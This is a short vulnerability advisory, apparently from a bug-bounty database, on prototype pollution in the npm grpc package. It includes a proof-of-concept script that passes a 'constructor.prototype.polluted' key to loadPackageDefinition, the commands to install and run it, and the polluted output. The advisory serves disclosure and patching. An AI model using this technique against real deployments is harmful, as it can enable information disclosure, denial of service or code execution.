Lucene search

K
huntrD3v53c2-NPM-GRPC
HistoryJan 26, 2021 - 12:00 a.m.

Prototype Pollution in grpc/grpc-node

2021-01-2600:00:00
d3v53c
www.huntr.dev
18
grpc
prototype pollution
information disclosure
dos
rce
vulnerable package
poc
npm installation
output

EPSS

0.005

Percentile

77.6%

Description

grpc native core package is vulnerable to Prototype Pollution.
This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.

Proof of Concept

  1. Create the following PoC file:
// poc.js
var grpc =require('grpc')
grpc.loadPackageDefinition({'constructor.prototype.polluted': "Yes! Its Polluted"});
console.log({}.polluted)
  1. Execute the following commands in another terminal:
npm i grpc # Install affected module
node poc.js #  Run the PoC
  1. Check the Output:
[Function: ServiceClient] { service: 'Yes! Its Polluted' }